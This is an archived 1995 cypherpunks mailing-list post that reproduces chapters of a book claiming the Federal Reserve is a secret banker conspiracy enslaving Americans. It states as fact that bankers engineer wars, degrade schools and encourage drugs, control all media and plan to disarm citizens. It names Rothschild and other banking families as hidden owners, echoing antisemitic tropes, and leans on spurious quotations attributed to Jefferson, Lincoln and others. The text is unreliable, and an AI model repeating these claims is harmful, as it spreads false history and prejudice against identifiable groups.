player signs a "mortgage" agreeing to give the "banker" some real pro-
perty (car, home, farm, business, etc.). If the payments should go into
default, the banker takes the property. The payments must be made on time,
whether the player wins (makes a profit) or not.

   It is easy to see that no matter how skillfully the players play,
eventually the "banker" will end up with all of his chips back. Except
for the very best or "luckiest" players, the rest, if they stay in the
game long enough, will end up owing to the "banker" their cars, their
homes, their farms, their businesses, and perhaps even their watches,
rings, and the shirts off their backs!

   Sir Josiah Stamp, President of the Bank of England in the 1920s, and
the second richest man in Britain at the time, said:
   "Banking was conceived in iniquity and was born in sin. The bankers
own the earth. Take it away from them but leave them in power to create
deposits, and with the flick of the pen they create enough deposits to
buy it back again. However, take it away from them, and all the great
fortunes like mine will disappear, and they ought to disappear, for this
would be a happier and better world to live in. But, if you wish to re-
main the slaves of bankers and pay the cost of your own slavery, let
them continue to create deposits."

   Our real-life situation is much worse than any poker game. In a poker
game no one is forced to go into debt, and anyone can quit at any time
and keep whatever he or she still has. But in real life, even if we borrow
little ourselves from the bankers, the local, state, and federal govern-
ments borrow billions in our name, squander it, then confiscate our earn-
ings from us and pay it to the bankers with interest. We are forced to
play their game, and it seems we can only leave the game by dying. We
pay as long as we live, and our childern pay after we die. If we cannot
pay, the same government sends the police to take our property and give
it to the bankers. The bankers risk nothing (at least, the Federal
Reserve bankers) in the game; they just collect their percentage and "win
it all." In Las Vegas all the games are "rigged" to pay the house (owner)
a percentage. They rake in millions. The Federal Reserve bankers' "game"
is similarly rigged, and it pays off in billions.

   In recent years bankers have added more "cards" to their game.
"Credit" cards are promoted as a convenience and a great boon to trade.
Actually, they are ingenious devices by which bankers collect %2 to 5%
of every retail sale from the seller and 18% or more interest from buy-
ers. A real stacked deck!

              POLITICIANS AND BANKERS IN THE SAME LEAGUE

   Democrat, Republican, and Independent voters have wondered why poli-
ticians always spend more tax currency than they collect. The reason
should now be clear. When you study our "debt-currency" system, you soon
realize that the politicians are not the agents of the people. They are
the agents of the Federal Reserve Bankers, for whom they plan ways to
place the people further in debt. Let me again quote the words of Senator
John Danforth:
   "I have never seen more senators express discontent with their jobs...
I think the major cause is that, deep down in our hearts, we have been
accomplices to doing something terrible and unforgivable to this wonder-
ful country. Deep down in our hearts, we know that we have bankrupted
America and that we have given our children a legacy of bankruptcy....
We have defrauded our country to get ourselves elected."

   Article 1, Section 8 of the U.S. Constitution states, "The Congress
shall have power... to coin money, regulate the value thereof..." But what
have our politicians done? In 1913 the traitorously gave the U.S. Treasury
to the Federal Reserve bankers - lock, stock, and barrel! Someone recently
asked, "What's the difference between Kindergarten and Congress?" Answer:
"One has adult supervision!" Actually, we shouldn't criticize Congress,
after all, we have the best Congress money can buy. Chapter Ten examines
Congress in more detail.

                    FEDERAL RESERVE SYSTEM AUDIT

   The Federal Reserve has never been audited by the government. In 1975
a bill H.R. 4316, to require Federal Reserve audits, was introduced in
Congress. Due to pressure from the currency-controllers, it was rejected.
No audit of the Federal Reserve has ever been done.

                       MOUNTING DEBTS AND WARS

   We, as a people are now ruled by a "banker-owned system" that has
usurped the mantle of government, disguised itself as our legitimate
government, and set about to pauperize and control the people. It is now
a centralized, all-powerful apparatus whose main purposes are spending the
people's currency, promoting war, and propagandizing to perpetuate itself
in power. Our two large political parties (the "Demopublicans" also call-
ed "Republicrats") have become its servants, the various departments of
government its spending agencies, and the Internal Revenue Service its
collection agency.

   Unknown to the people, our "banker-owned system" operates in close
cooperation with similar apparatuses in other nations, also disguised as
"governments." Some, we are told, are friends. Others, we are told, are
enemies. "Enemies" are built up through international manipulations and
used to frighten the American people into going billions of dollars more
into debt to the bankers for "military preparedness," "foreign aid to
stop communism," "minority rights," etc. Citizens, deliberately confused
by brainwashing propaganda, watch helplessly while our politicians give
our food, goods, and gold to banker-controlled alien governments under the
guise of "better relations," "easing tensions," or "humanitarian aide."
Our banker-controlled government takes our finest and bravest sons and
sends them into foreign wars, where tens of thousands are murdered and
hundreds of thousands are crippled. Other thousands are morally corrupted
and addicted to drugs. When the "war" is over we have gained nothing, but
we are scores of billions mre in debt to the bankers - which was the real
reason for the war in the first place!

                   MORE THAN JUST ECONOMIC RAPE

   The profits from these massive debts have been used to erect a com-
plete and almost hidden economic and political colossus over our nation.
Our "banker-owned system" keeps telling us they are trying to do us good,
when in truth they work to harm and injure the people. These would-be
despots kow it is easier to control and rob an ignorant, poorly-educated,
and confused people than it is an informed population, so they deliber-
ately degrade our educational systems. For the same reason they secretly
favor drug use, alcohol, racial conflict, and crime in general. Their "war
on drugs," as an example, only produces more drug use and a host of relat-
ed crimes. Everything which debilitates the minds and bodies of the people
is secretly encouraged, as it makes the people less able to oppose them,
or even to understand what is being done to them. The system wants medio-
cre, unthinking, helpless "sheople."

   Family, morals, and all that is honorable is being swept away, while
our "banker-owned system" builds their new subservient man, the found-
ation of their "new world order." Our new rulers are trying to change our
whole political, social, and racial order, but they will not change the
debt-currency economic system by which they rob and rule. Our people have
become tenants and "debt-slaves" to the bankers and their agents in the
land our fathers conquered. It is conquest through the most gigantic
fraud and swindle in the history of humankind. And we remind you again:
The key to their wealth and power over us is their MONOPOLISTIC ability
to "create" currency out of nothing and to lend it to us at interest. If
Congress had not allowed them to do that, they never would have gained
secret control over our nation.

                   CONTROLLED NEWS AND INFORMATION

   This currency-lender conspiracy ("consPIRACY") is as old as Babylon.
Even in America it dates far back before 1913. Actually, 1913 was the
year in which the way opened for complete economic conquest of our peo-
ple. The conspiracy is old enough to America so that the system's agents
have been for many years in positions such as newspaper publishers, edit-
tors, columnists, church ministers, university presidents, professors,
textbook authors, attorneys, accountants, labor union leaders, movie mak-
ers, radio and TV commentators, politicians from school board members to
U.S. Presidents, and many others.

   These agents control the information available to our people. They
manipulate public opinion, elect who they will locally and nationally,
and never expose the crooked currency system. They promote school bonds,
municipal bonds, expensive and detrimental farm programs, "urban renew-
al," "foreign aid," and many other schemes which will put the people more
in debt to the bankers. Thoughtful citizens wonder why billions are spent
on one program and billions on another which may duplicate or even null-
ify it, such as paying some farmers not to raise crops, while at the same
time building dams or canals to irrigate more farm land. Crazy or stupid?
Neither. The goal is more debt. Thousands of government-sponsored ways to
waste "money" are perpetrated continually. Most make no sense, but they
are never exposed for what they really are: builders of billions for the
bankers and debts for the people.

   So-called "economic experts" write syndicated columns in hundreds of
newspapers, craftily designed to prevent the people from learning the
simple truth about our debt-currency system. Commentators on radio and
TV, educators, and politicians blame the people as wasteful, lazy, or
spendthrift, and blame the workers and consumers for the increase in
debts and the inflation of prices, when they really know that the basic
cause is the debt-currency system itself. Our people are drowned in char-
ges and counter-charges designed to confuse them and keep them from under-
standing the evil currency system that so silently robs the workers, farm-
ers, and business people of the fruit of their labor. And, increasingly,
the system is being used to rob us of our rights and freedoms, supposedly
guaranteed by the U.S. Constitution.

   In his book INVENTING REALITY,  Michael Parenti wrote:
   "Ten business and financial corporations control the three major tele-
vision and radio networks (NBC, CBS, ABC), 34 subsidiary television stat-
ions, 201 cable TV systems, 62 radio stations, 20 record companies, 59
magazines, 58 newspapers, including the NEW YORK TIMES, the WASHINGTON
POST, THE WALL STREET JOURNAL, and the LOS ANGELES TIMES, 41 book pub-
lishers and various motion picture companies like Columbia Pictures and
Twentieth Century Fox. Three quarters of the major stockholders of ABC,
CBS and NBC are banks, such as Chase Manhattan, Morgan Guaranty Trust,
Citibank, and Bank of America.
   The overall pattern is one of increasing concentration of ownership
and earnings. According to a 1982 LOS ANGLEES TIMES survey, independent
daily newspapers are being gobbled up by the chains at the rate of fifty
or sixty a year. Ten newspaper chains earn over half of all newspaper rev-
enue in this country. Five media conglomerates share 95 percent of the
record and tapes market with Warner and CBS alone controlling 65 percent
of the market. Eight Hollywood studios account for 89 percent of U.S.
feature film rentals. Three television networks earn over two-thirds of
total U.S. television revenues. Seven paperback publishers dominate the
mass market for books...
   While having an abundance of numbers and giving an appearance of di-
versity, the mass media actually are highly centralized outlets that
proffer a remarkably homogenized fare. New services for dailies through-
out the entire nation are provided by the Associated Press and United
Press International (which may soon merge with AP or go under), The New
York Times-Washington Post wire services, and several foreign wire ser-
vices like Reuters. The ideological viewpoint of these news conduits are
pretty much the same, marked by prefabricated standardization of news
which is constricting and frightening."

   In his book THE MEDIA MONOPOLY, Ben H. Bagdikian writes:
"The power to control information is a major lever in the control of
society. Giving citizens a choice in ideas and information is as impor-
tant as giving them a choice in politics. If a nation has narrowly con-
trolled information it will soon have narrowly controlled politics."

   When a few informed and concerned people or organizations who know the
truth begin to expose the bankers and their agents, or try to stop any of
their mad schemes, the messengers are ridiculed and smeared as "right-
wing extremists," "super-patriots," "bigots," "racists," "facists," or
"antisemites." Any name is used to discredit them, and to stop other peo-
ple from listening. Books and articles such as you are now reading are
kept out of schools, libraries, and book stores.

   Some, who are especially vocal in their exposure of the treason com-
mitted against our people, are harassed by government agencies such as
the IRS, FDA, EPA, OSHA, and others, causing them financial loss or bank-
ruptcy. Sometimes their businesses and homes are violently raided at gun-
point, and their money, currency, equipment, and records confiscated, so
it is very difficult, if at all possible to continue their business. In
Chapter One the National Commodity and Barter Association was mentioned as
an example of such raids. But the most striking case has been that of Ezra
Pound, which is covered below.

   Using these methods, the Federal Reserve bankers and their agents have
been completely successful in preventing most Americans from learning the
things you are reading in this report. However, in spite of their control
of information, they realize that more and more citizens are learning the
truth. Therefore, to prevent retaliation and armed resistance to their
plunder of America, they plan to register all firearms and eventually
disarm all citizens. They want to eliminate all guns not in the hands of
their government police or army. Our wise Founding Fathers wrote the Se-
cond Amendment to the Constitution so that the people could protect them-
selves against the government.

   Love of life, interest in your freedom, compassion for humanity, con-
cern for your children, and the safety of all you have worked for should
make you deeply interested in this, America's greatest problem. Our gener-
ation has not suffered under the bankers' yoke as the coming generations
will. Usury and taxes will continue to take a larger and larger part of
the earnings of the people and put them deeper into the pockets of the
bankers and their agents. Increasing "government" regulations will prevent citizen
protest and opposition to their control. Is it possible that your grand-
children will own neither car nor home, but will live in "government-
owned" apratments and ride to work in "government-owned" buses, and be
allowed to keep just enough of their earnings to buy a minimum of food and
clothing, while their rulers wallow in luxury? In Asia and Eastern Europe
this used to be called communism. In America it is called democracy or
capitalism.

   Horace Greeley stated, "While boasting of our noble deeds, we are
careful to conceal the ugly fact that by an iniquitious currency system
we have nationalized a system of oppression which, though more refined, is
no less cruel than the old system of chattel slavery."

                     THE CASE OF EZRA POUND

   Ezra Pound was a poet, one of America's greatest - if not the great-
est. He played a major role in the development of writers and poets, such
as E.E. Cummings, T.S. Elliot, Robert Frost, Ernest Hemingway, James Joyce,
and William Carlos Williams. He also studied politics, economics, banking,
and monetary theory. He disapproved of war. During World War II, he hid a
number of Jews from the Nazi exterminators; if discovered the penalty
would have been death. He broadcast a series of talks on Italian radio
aimed at Americans. He had wanted America to stay out of the war, and he
said some uncomplimentary things about President Franklin D. Roosevelt. He
also stated some of his political and monetary ideas. He was accused of
being a traitor. At the end of the war he was imprisoned in an American
concentration camp near Pisa, Italy for six months without trial. Then he
was transferred to America where he was declared insane and imprisoned in
a mental hospital in Washington D.C. for thirteen years. After which the
treason charges, for which he had never stood trial, were dropped, and he
was released. He returned to Italy, where he lived until his death in
1972.

   The reason he was not tried seems to be that his prosecutors didn't
have a case that would hold up in court and/or they were afraid that he
would repeat in court what he had said over the radio in Italy. Wendell
Muncie, M.D., one of the psychiatrists involved in his "sanity hearing,"
said that Pound's insanity consisted of three factors: his passion for the
U.S. Constitution, his espousal of the Confucian ethic, and his desire for
world peace. No formal diagnosis of Pound's supposed "insanity" has been
found. His captors in Washington openly admitted that Pound was a polit-
ical prisoner. A Congressional investigation started in 1957 and completed
in 1958 exposed the inadequacy of the case against Pound and led to his
release.
   Here are some extracts from Pound's radio talks:
. "I think an alliance with Stalin's Russia is rotten." (January 29,1942)
."Liberty is not a right but a duty." (March 8, 1942)
."Sovereignty inheres in the right to issue money. And the American sov-
ereignty belongs by right to the people, and their representatives in
Congress have the right to issue money and to determine the value thereof.
And 120 million, 120 million suckers have lamentably failed to insist on
the obeservation of this quite decided law.... Now the point at which em-
bezzlement of the nation's funds on the part of her officers becomes trea-
son can probably be decided only by jurists, and not by hand-picked judges
who support illegality." (April 9, 1942)
.Quotes read by Pound: 1. "'I believe that banking institutions are more
dangerous to our liberties than standing armies.' - Thomas Jefferson.
2. 'I have two great enemies, the southern army in front of me and the
financial institutions in the rear. Of the two, the one in the rear is the
greatest enemy.' - Abraham Lincoln.
3. 'The money power preys upon the nation in times of peace and conspires
against it in times of adversity. It is more despotic than monarchy, more
insolent than autocracy, more selfish than bureaucracy; it denounces as
public enemies all who question its methods, or throw light upon its
crimes.' - William Jennings Bryan." (July 26, 1942)
.Back to Pound's own words: "Wars in old times were made to get slaves.
The modern implement of imposing slavery is debt." (March 25, 1943)
."The phase of the usury system which we are trying to analyze is more or
less Patterson''s perception that the Bank of England could have benefit
of all the interest on all the money that it creates out of nothing....
Now the American citizen can, of course, appeal to his constitution, which
states that Congress shall have power to coin money or regulate the value
thereof and of foreign coin. Such appeal is perhaps quixotic." (March 30,
1943)
."That text is known to them that have the patience to read it, possibly
one-hundredth of one percent of the denizens. They forget it, all save
a few Western states. I think somebody in Dakota once read it. The Consti-
tution." June 30, 1943)

       THE FEDERAL RESERVE SYSTEM IS UNCONSTITUTIONALAND ILLEGAL

   Although there has never been a court case that challenged the legal-
ity of the Federal Reserve System, there was a challenge to the National
Recovery Act or NRA, which has ruled unconstitutional. The U.S. Supreme
Court - Schechter Poultry v. U.S.,29 U.S.495, 55 U.S. 837.842 (1935) -
ruled that, "Congress may not ABDICATE OR TRANSFER TO OTHERS ITS LEGITI-
MATE FUNCTIONS.." Article I, Section 8 of the U.S. Constitution states,
"The Congress shall have power... to coin money, regulate the value there-
of..." By passing the Federal Reserve Act, Congress abdicated and trans-
ferred to the Federal Reserve bankers its constitutionally legitimate
function of issuing and controlling money. If the Supreme Court ruling on
the NRA is applied to the Federal Reserve System, the unconstitutionality
and illegality of the Fed becomes obvious.

                        TELL THE PEOPLE

   America will not shake off her illegal banker-controlled dictatorship
as long as the people are ignorant of the hidden controllers. Interna-
tional bankers, who control most of the governments of the nations and
most sources of information, seem to have us completely in their grasp.
They are afraid of only one thing: an awakened citizenry armed with the
truth. An ignorant citizen is the banker-government's best "client." An
informed citizen is the banker-government's worst nightmare.

   Robert H. Hemphill, Credit Manager of the Federal Reserve Bank of At-
lanta Georgia, said:
   "This is a staggering thought. We are completely dependent on the com-
mercial banks. Someone has to borrow every dollar we have in circulation,
cash, or credit. If the banks create ample synthetic money, we are pros-
perous; if not, we starve. We are absolutely without a permanent money
system. When one gets a complete grasp of the picture, the tragic absur-
dity of our hopeless position is almost incredible, but there it is. It
is the most important subject intelligent persons can investigate and re-
flect upon. It is so important that our present civilization may collapse
unless it becomes widely understood and the defect remedied very soon."

                        PRIVATE BANKING

   In California a very private "non-bank" has been operating successfully
for fifteen years. It caters for accounts in gold or Federal Reserve
Notes. It is completely private and doesn't report to anyone. It pays in-
terest on both gold and Federal Reserve Note balances. Ideally, we need to
establish a network of private banks throughout the country, and even-
tually throughout the rest of the world. See Chapter Twelve.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Anonymous)
Date: Wed, 27 Sep 95 23:11:31 PDT
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199509280611.HAA02217@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


   This is the best description of debt currency I've seen. Debt currency
is today's most effective form of slavery. It is today's American slavery.

                The text is from the book:

               THE ECONOMIC RAPE OF AMERICA
                 WHAT YOU CAN DO ABOUT IT

by Frederick Mann of Terra Libra

The book costs $19.95 plus $2 postage and handling.
It can be ordered from:

Terra Libra
2430 E. Roosevelt #998
Phoenix, Az 85008


                           CHAPTER THREE

                      THE FEDERAL RESERVE BANKERS

Then Jesus entered the temple and drove out all who were selling and buy-
ing in the temple, and he overturned the tables of the money changers and
the seats of those who sold doves. He said to them, "It is written, 'My
house shall be called a house of prayer'; but you are making it a den of
robbers."  Matthew 21, verses 12-13

   "All of the perplexities, confusion, and distress in America arises,
not from the defects of the Constitution or Confederation, not from want
of honor or virtue, so much as from downright ignorance of the nature of
coin, credit, and circulation."
                         John Adams, Founding Father
                      (In a letter to Thomas Jefferson, 1787)

   Congressman Louis T. McFadden said the following during a speech before
Congress on June 10, 1932:
   "Mr. Cairman, we have in this country one of the most corrupt institut-
ions the world has ever know. I refer to the Federal Reserve Board and the
Federal Reserve Banks. The Federal Reserve Board, a government board, has
cheated the Government of the United States and the people of the United
States out of enough money to pay the national debt. The depredations and
the iniquities of the Federal Reserve Board and the Federal Reserve banks
acting togeather have cost this country enough money to pay the national
debt several times over. This evil institution has impoverished and ruined
the people of the United States; has bankrupted itself, and has practi-
cally bankrupted our government. It has done this through the defects of
the law under which it operates, through the maladministration of that law
by the Federal Reserve Board, and through the corrupt practices of the
moneyed vultures who control it.
  Some people think the Federal Reserve banks are United States Government
institutions. They are not government institutions. They are private cre-
dit monopolies which prey upon the people of the United States for the
benefit of themselves and their foreign swindlers; and rich and predatory
money lenders. In that dark crew of financial pirates there are those who
would cut a man's throat to get a dollar out of his pocket; there are
those who send money into states to buy votes to control our legislation;
and there are those who maintain an international propaganda for the pur-
pose of deceiving us and wheedling us into the granting of new concessions
which will permit them to cover up their past misdeeds and set again in
motion their gigantic train of crime."

                PERVASIVE MONEY PROBLEMS IN AMERICA

   Americans, living in "the richest nation on earth," always seem to be
short of money. Women are working in unprecedented numbers, men hope for
overtime hours to earn more. Many take parttime jobs evenings and week-
ends. Children look for odd jobs to earn spending money. But the family
debt climbs higher. And psychologists say one of the biggest causes of
family quarrels and breakups is "arguments over money." Much of this
trouble can be can be traced to our "counterfeit money" system, which
leaves government free to perpetrate the most destructive monetary and
economic crimes.

   On the national scale, in just ten years the federal debt has grown
from less than on trillion dollars to over four trillion. (In Chapter Nine
we will discover that the real national debt is much biggger.) The annual
interest on that debt is over $250 billion. And now we are told (not ask-
ed) that we must come up with between $200 billion and $500 billion to
"save" the S & L institutions. All this for only one reason: to protect
and perpetuate a fundamentally flawed system whose only object is to en-
rich and empower the Federal Reserve bankers who own and operate the sys-
tem.

   During the last few years America has become by far the largest debtor
nation of the world. And our politicians have made their "contributions"
with boundless "generosity!" John Danforth, Republican senator from Miss-
ouri, was reported in the Arizona Republic of April 21, 1992 as follows:
  "I have never seen more senators express discontent with their jobs...
I think the major cause is that, deep down in our hearts, we have been ac-
complices to doing something terrible and unforgivable to this wonderful
country. Deep down in our hearts, we know that we have bankrupted America
and that we have given our children a legacy of bankruptcy.... We have de-
frauded our country to get ourselves elected."

          PAPER CURRENCY CAN BE A VERY PROFITABLE HUMAN CREATION

   Economists use the word "create" when speaking of the process by which
paper currency comes into existence. "Creation" means making something
that did not exist before. Lumbermen make boards from trees, workers build
houses from lumber, and factories manufacture automobiles from metal,
glass, and other materials. But in all these cases they did not CREATE.
They only changed existing materials into more usable and more valuable
forms. Not so with currency. Here we actually CREATE something out of
nothing. A piece of paper of little value is printed so it becomes worth a
piece of lumber. That difference in value is literally CREATED out of
nothing. And with different numbers printed on the piece of paper, it can
buy the automobile or even the house. The VALUE of the paper has been
CREATED in the true sense of the word.

   Paper currency can be created honestly or fraudulently. Gold and silver
certificates, being receipts for gold and silver, with a guarantee to pay
the bearer on demand, are honest paper currency. Federal Reserve Notes
currently in circulation constitute fraudulent, counterfeit paper curr-
ency.

   Counterfeit paper currency is very cheap to "create," and whoever
prints it makes a huge profit! Builders work hard to make a profit of 5%
above their cost in building a house. Auto makers sell their cars 1% to
2% above the cost of manufacture, which is considered good business. But
counterfeit paper currency "manufacturers" have no limit on their profits
since a few cents will print a $1 bill, a $100 bill, or even a $10,000
bill.

               THE DANGER OF A MONOPOLISTIC CENTRAL BANK

   Thomas Jefferson understood the danger of putting the power to control
the currency of a nation in the hands of a few individuals in the form of
a MONOPOLISTIC central bank. This is why he opposed Alexander Hamilton's
scheme to establish the First Bank of the United States. Let me repeat
what he said in 1791:
   "If the American people ever allow the banks to control issuance of
their currency, first by inflation and then by deflation, the banks and
corporations that grow up around them will deprive the people of all pro-
perty until their children will wake up homeless on the continent their
fathers occupied."

   President Andrew Jackson also understood the danger. He refused to re-
new the charter (a grant of MONOPOLY) of the Second Bank of the United
States. In 1836 Jackson said to the bankers trying to persuade him to re-
new their charter (so they could continue their harmful MONOPOLY):
   "You are a den of vipers. I intend to rout you out and by the Eternal
God I will rout you out. If the people only understood the rank injustice
of our money and banking system, there would be a revolution before morn-
ing."

   On December 22, 1913, the day before President Woodrow Wilson signed
the Federal Reserve Act, Congressman Charles A. Lindberg Sr. (father of
the famous aviator) said to the House:
   "This Act establishes the most gigantic trust [*] on earth. When the
President signs this bill, the invisible government by the Monetary Power
will be legalized. The people may not know it immediately, but the day of
reckoning is only a few years removed. The trusts [*] will soon realize
that they have gone too far even for their own good. The people must make
a declaration of independence to relieve themselves from the Monetary
Power. This they will be able to do by taking control of Congress. Wall
Streeters could not cheat us if you Senators and Representatives did not
make a humbug of Congress... The greatest crime of congress is its curr-
ency system. The worst legislative crime of the ages is perpetrated by
this banking bill. The caucus and the party bosses have again operated and
prevented the people from getting the benefit of their own government."
[* At that time the word "trust" was synonymous with "MONOPOLY."]

                  THE DEPRESSION OF THE 1930s

   In 1930 America did not lack industrial capacity, fertile farmland,
skilled or willing workers, or industrious families. It had an extensive
and highly efficient transportation system in railroads, road networks,
and inland and ocean waterways. Communications between regions and local-
ities were the best in the world, utilizing telephone, teletype, radio,
and a well-operated mail system. No war had ravaged the cities or the
countryside, no pestilence weakened the population, nor had famine stalked
the land.

   In AMERICA'S GREAT DEPRESSION, Murray N. Rothbard, Professor of Eco-
nomics at the University of Nevada, Las Vegas, describes how the creation
of the Federal Reserve System increased the bankers' ability to inflate
the currency supply sixfold. During 1923 to 1929 the bankers did inflate
the currency suppy enormously. Such an artificial inflation inevitably
brings about a subsequent need for deflation. Federal Reserve bankers, the
source of America's currency and credit, reduced the currency supply by
refusing loans to stable and growing industries, stores, and farmers. At
the same time they demanded payment on existing loans. They also increased
interest rates. Currency was rapidly taken out of circulation and was not
replaced. America was put in a depression and in deep trouble. Goods were
available to be purchased, jobs waiting to be done, but little currency
was available. Twenty-five percent of workers were laid off. Banks took
possession of tens of thousands of farms and businesses through foreclo-
sure. Gloom settled over America.
   The contraction of the currency supply caused the stock market to
collapse and the ensuing depression. Seven months before the collase, Paul
Warburg, the main architect of the Federal Reserve System, in his annual
report to the stockholders of his International Acceptance Bank, wrote:
   "If the orgies of unrestrained speculation are permitted to spread, the
ultimate collapse is certain not only to affect the speculators themselves,
but to bring about a general depression involving the entire country."
   Both the inflation and the deflation, causing the depression, had been
planned - as predicted by Jefferson in 1791!

              CURRENCY INFLATION ENDED THE "GREAT DEPRESSION"

   The depression lasted until 1939, when the Federal Reserve System began
to send large amounts of currency into circulation for military prepared-
ness. As soon as the currency supply went up, people were hired back to
work, farms sold their produce instead of plowing it under, mines reopen-
ed, factories began to hum, both industrial and residential construction
began anew, and the "Great Depression" was over. Some politicians were
blamed for it and others took credit for ending it. The truth was that
bankers caused it and bankers ended it. The people were never told that
simple truth. The bankers who "manufacture" and "control" our currency
have used their huge profits to "buy" our politicians, and ultimately to
control our government.

                 POWER TO COIN AND REGULATE MONEY

   When we see the disastrous results of an artificially created shortage
of currency, we can better understand why our Founding Fathers insisted on
placing the power to create and control money in the hands of Congress.
Article I, Section 8 of the U.S. Constitution states, "The Congress shall
have power... to coin money, regulate the value thereof..."

   But in 1913 Congress passed the "Federal Reserve Act," relinquishing
the power to create and control money to the Federal Reserve Corporation,
a private company owned and controlled by bankers. The word "Federal" was
used only to deceive the people. The term "central bank" was carefully a-
voided. The Federal Reserve Act created a Board of Directors, the Federal
Reserve Board, to run the Federal Reserve Corportaion with a MONOPOLY to
create and control the currency of the United States.

   This infamous legislation was acompanied with appropriate fanfare and
propaganda that it would "remove money from politics" and "prevent boom and
bust from hurting our citizens." The people were not told then, and still
do not know today, that the Federal Reserve Corporation is a private MONO-
POLY controlled by bankers, operated for the financial gain of the bankers
at the expense of the people.

   Since that day of infamy a small group of privileged people who lend
us "our money," have accrued to themselves all of the profits of printing
paper currency - and more! Since 1913 they have created trillions of dol-
lars in currency and credit, which as their own personal property, they
then lent to our government and our people, with interest. "The rich get
richer and the poor get poorer" had become the secret policy of our nat-
ional government.

   The main architect of the Federal Reserve System was Paul Moritz War-
burg, who came from a famous German banking family. The kingpin who steer-
ed the Federal Reserve Act through Congress was Senator Nelson Aldrich,
Chairman fo the Finance Committee. He was the maternal grandfather of Nel-
son A. Rockefeller, of Standard Oil and Chase Manhattan Bank. Aldrich's
daughter, Abby Greene Aldrich, married John D. Rockerfeller, Jr. in 1901.
At the time, many people regarded Senator Aldrich as the Rockefeller fam-
ily's mouthpiece in the Senate.

   The Federal Reserve Act was passed during the presidency of Woodrow
Wilson. Just before he died Wilson is reported to have said that he had
been deceived and "I have betrayed my country." He also said:
   "A great industrial nation is controlled by its system of credit. Our
system of credit has been concentrated. The growth of the nation and all
our activities are in the hands of a few men. We have come to be one of
the worst ruled, one of the most completely controlled and dominated gov-
ernments in the world - no longer a government of free opinion, no longer
a government by conviction and vote of the majority, but a government by
the opinion and duress of small groups of dominant men."

                  WHO OWNS THE FEDERAL RESERVE?

   There has been much speculation about who owns the Federal Reserve Cor-
poration. It has been one of the best kept secrets of the century, because
the Federal Reserve Act of 1913 provided that the names of the owner banks
be kept secret. However, R.E. McMaster publisher of the newsletter THE
REAPER, asked his Swiss banking contacts which banks hold the controlling
stock in the Federal Reserve Corporation. The answer:
1. Rothschild Banks of London and Berlin
2. Lazard Brothers Bank of Paris
3. Israel Moses Sieff Banks of Italy
4. Warburg Bank of Hamburg and Amsterdam
5. Lehman Brothers Bank of New York
6. Kuhn Loeb Bank of New York
7. Chase manhattan Bank of New York
8. Goldman Sachs Bank of New York.
   In THE SECRETS OF THE FEDERAL RESERVE, Eustace Mullins indicates that,
because the Federal Reserve Bank of New York sets interest rates and con-
trols the daily supply and price of currency throughout the U.S., the
owners of that bank are the real directors of the entire system. Mullins
states:
   "The shareholders of these banks which own the stock of the Federal
Reserve Bank of New York are the people who have controlled our political
and economic destinies since 1914. They are the Rothschilds, Lazard Freres
(Eugene Mayer), Israel Sieff, Kuhn Loeb company, Warburg Company, Lehman
Brothers, Goldman Sachs, the Rockefeller family, and the J.P. Morgan in-
terests."


          THEY PRINT IT - WE BORROW IT AND PAY THEM INTEREST

   An example of the process of currency creation and its conversion
into "people's debt" will aid our understanding. The Federal Government,
having spent more than it has taken from its citizens in taxes, needs
(for the sake of illustration) $1 billion. Since it does not have the
currency, and Congress has given away its authority to create it, the
government must go to the creators for the $1 billion. But the Federal
Reserve, a private corporation, does not give its currency away for free!
The bankers are willing to deliver $1 billion in currency or credit to
the federal government in exchange for the government's agreement to pay
it back with interest. So Congress authorizes the Treasury Department to
print $1 billion in U.S. Bonds, which are then delivered to the Federal
Reserve bankers. (The bonds are a kind of "IOU" that bears interest.)

   The U.S Treasury prints $1 billion in bank notes. The printing cost is
about $20.62 per 1,000 bills - it costs the same irrespective of the de-
nomination - the cost of printing a $1 note is about the same as for a
$100 note: about .0206 cents. The Federal Reserve "buys" these bills from
the U.S. Treasury, paying only for the printing costs. The bills are then
exchanged at full face value for the bonds. The government uses the curr-
ency to pay its obligations. What are the results of this fantastic trans-
action? Well, the government's bills are paid all right, but the U.S. Gov-
ernment has now indebted the people to the Federal Reserve bankers for $1
billion plus interest!

   Since this process has been going on since 1913, the people are now
indebted to the bankers to the tune of trillions of dollars. The people
are taxed billions of dollars each month just to pay the interest on this
"national debt." With both the principal and the interest climbing every
month, there is no hope of ever paying off this "debt." The working people
of the United States now "owe" the approximately 300 banking families and
their consorts more than the assessed value of all the assets in the
United States. And realize, the bankers got all this for the cost of
paper, ink, and bookkeeping!

                      THE MOUNTAIN OF DEBT

   You say this is terrible! Yes it is, but this is only part of the
sordid story. Under this "debt-currency" system, those U.S. Bonds referred
to above have now become assets of the banks, called their "reserve."
Regular commercial banks use these assets to issue loans to individual and
commercial customers. Since the banking laws require only about a 12%
reserve, this means the banking faternity can lend up to eight times the
amount of the bonds they have on hand. As a result of the $1 billion
discussed here, they can lend $8 billion to private customers at inter-
est. This means that together with the $1 billion lent to the government,
the bankers can lend out $9 billion at interest for the original cost to
them of about $400,000 for the printing! And because the Federal Reserve
bankers have been granted a MONOPOLY, the only way our people and bus-
inesses can get currency to carry on trade and expand industry and farm-
ing is to borrow it from the bankers!

                 USING DEBT TO EXPAND CONTROL

   In addition to the vast wealth drawn to them through this almost un-
limited usury, the bankers who control the currency are able to approve
or disapprove large loans to big and successful corporations. Bankers can
refuse a loan, thereby depressing the price of a corporation's shares on
the stock exchange. This enables the bankers' agents to buy large blocks
of the shares at depressed prices. Then they can approve a multi-million
dollar loan to the corporation, resulting in its share price rising,
allowing the bankers' agents to sell the shares, sometimes making huge
profits. In this manner billions of dollars are made to buy even more
shares.

   Using this method since 1913, the bankers and their agents have pur-
chased secret or open control of almost every large corporation in Amer-
ica. Using that control, they force the corporations to borrow huge sums
from their banks so that corporate earnings are partially siphoned off in
the form of interest paid to the banks. This leaves little "actual profit"
to be paid out as dividends.

   When bankers lend more, the currency supply expands. When they reign
in the loans, the currency supply contracts. By expanding or contracting
the currency supply, the bankers can make the stock market go up or down
at their pockets' content! They can cause "busts and booms" almost as
they wish.

   That is why President James A. Garfield said, "Whoever controls the
volume of money in any country is absolute master of all industry and
commerce."

   At the time of writing (July, 1992), the New York stock market has
been hovering around record highs for months, while the economy continues
to suffer a protracted slump. The bankers no doubt want the stock mar-
ket to be high and the economy to recover before the coming presidential
